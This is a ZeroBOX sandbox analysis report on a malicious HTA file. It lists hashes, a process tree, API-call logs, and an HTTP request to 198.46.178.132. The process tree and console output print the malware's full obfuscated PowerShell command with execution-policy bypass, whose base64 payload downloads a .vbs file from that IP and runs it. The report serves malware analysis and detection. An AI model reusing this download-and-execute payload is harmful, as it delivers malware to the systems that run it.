Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Jan. 24, 2025, 1:53 p.m.	Jan. 24, 2025, 2:03 p.m.

Size	420.8KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`d117eda2dd1980d9fec5fff46bac6a5b`
SHA256	`93435557d8a7e0a80c3eb0a7d466b2255b86febcc338f5ac9f69a4d546775087`
CRC32	`5603E4E7`
ssdeep	`768:t7nbjKx80AIu6GTs1A5fRgd4m2hX/kDr333K3TGG+jGx/waGIX/0GxL+jGxx1z0R:tc`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\nicethingsareworkingwithgreatthingsentiretimegivenmebest.hta
2536
- cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
  2632
  - powershell.exe POwErSHell.exe -ex BYPass -nOP -w 1 -c DeVICecredenTIalDePLOyMEnt.ExE ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CHAR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'frombAse64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXRDQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXRpbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4UFJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')))"
    2720
    - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wxt848r0.cmdline"
      2836
      - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFA6E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFA5D.tmp"
        2892
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\nicegirlfriendvideoentiretimeonbestthingstob.vbs"
      2972

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
198.46.178.132	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 24, 2025, 1:53 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 24, 2025, 1:53 p.m.			0	0

Command line console output was observed (28 events)

Time & API	Arguments	Status	Return
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: The term 'DeVICecredenTIalDePLOyMEnt.ExE' is not recognized as the name of a cm console_handle: 0x00000023	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: dlet, function, script file, or operable program. Check the spelling of the nam console_handle: 0x0000002f	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: e, or if a path was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: At line:1 char:31 console_handle: 0x00000047	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: + DeVICecredenTIalDePLOyMEnt.ExE <<<< ; IEx($(ieX('[SyStEm.teXt.eNCOdIng]'+[CH console_handle: 0x00000053	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: AR]0x3a+[chAR]0X3a+'uTF8.GeTStRiNg([SyStEM.CoNvert]'+[Char]58+[Char]0X3a+'fromb console_handle: 0x0000005f	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: Ase64StRInG('+[CHAr]0X22+'JE1pN0FFWFZkICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI console_handle: 0x0000006b	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: CAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZcGUgICAgICAgICAgICAg console_handle: 0x00000077	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: ICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRlRmlOSVRpT24gICAgICAgICAgICAgICAgICAgICA console_handle: 0x00000083	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: gICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgIC console_handle: 0x0000008f	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: AgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVyb console_handle: 0x0000009b	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: iBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAg console_handle: 0x000000a7	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: ICAgICAgIGVLbnBrWixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNuYXR console_handle: 0x000000b3	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: DQk93eSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWhOLHVpbnQgICAgIC console_handle: 0x000000bf	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: AgICAgICAgICAgICAgICAgICAgICAgICAgICAgTElpaSxJbnRQdHIgICAgICAgICAgICAgICAgICAgI console_handle: 0x000000cb	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: CAgICAgICAgICAgICAgc1lxdkhCSCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAt console_handle: 0x000000d7	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: bmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZEJjdEpoZyIgICAgICAgICAgICA console_handle: 0x000000e3	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: gICAgICAgICAgICAgICAgICAgICAgLW5hbWVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgIC console_handle: 0x000000ef	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: AgICAgICBqbmZWeGtxQmkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1O console_handle: 0x000000fb	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: yAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTWk3QUVYVmQ6OlVSTERvd25sb2FkVG9G console_handle: 0x00000107	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: aWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjEzMi8zMzMvbmljZWdpcmxmcmllbmR2aWRlb2VudGlyZXR console_handle: 0x00000113	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: pbWVvbmJlc3R0aGluZ3N0b2JlLmdJRiIsIiRFTnY6QVBQREFUQVxuaWNlZ2lybGZyaWVuZHZpZGVvZW console_handle: 0x0000011f	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: 50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMiLDAsMCk7U3RhclQtU0xFRVAoMyk7SW52T0tlLUV4U console_handle: 0x0000012b	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: FJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxuaWNl console_handle: 0x00000137	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: Z2lybGZyaWVuZHZpZGVvZW50aXJldGltZW9uYmVzdHRoaW5nc3RvYi52YnMi'+[CHaR]0X22+'))')) console_handle: 0x00000143	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: + CategoryInfo : ObjectNotFound: (DeVICecredenTIalDePLOyMEnt.ExE: console_handle: 0x0000015b	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: String) [], CommandNotFoundException console_handle: 0x00000167	1	1
WriteConsoleW Jan. 24, 2025, 1:53 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000173	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 90 events)

Time & API	Arguments	Status	Return
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0890 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1290 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e06d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e06d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e06d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e0f90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e10d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e1350 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0058eb78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059f6f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Jan. 24, 2025, 1:53 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0059c800 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 24, 2025, 1:53 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://198.46.178.132/333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF

Performs some HTTP requests (1 event)

request

GET http://198.46.178.132/333/nicegirlfriendvideoentiretimeonbestthingstobe.gIF

Allocates read-write-execute memory (usually to unpack itself) (50 out of 152 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034d0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034d0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x034d0000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 24, 2025, 1:53 p.m.	process_identifier: 2720 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
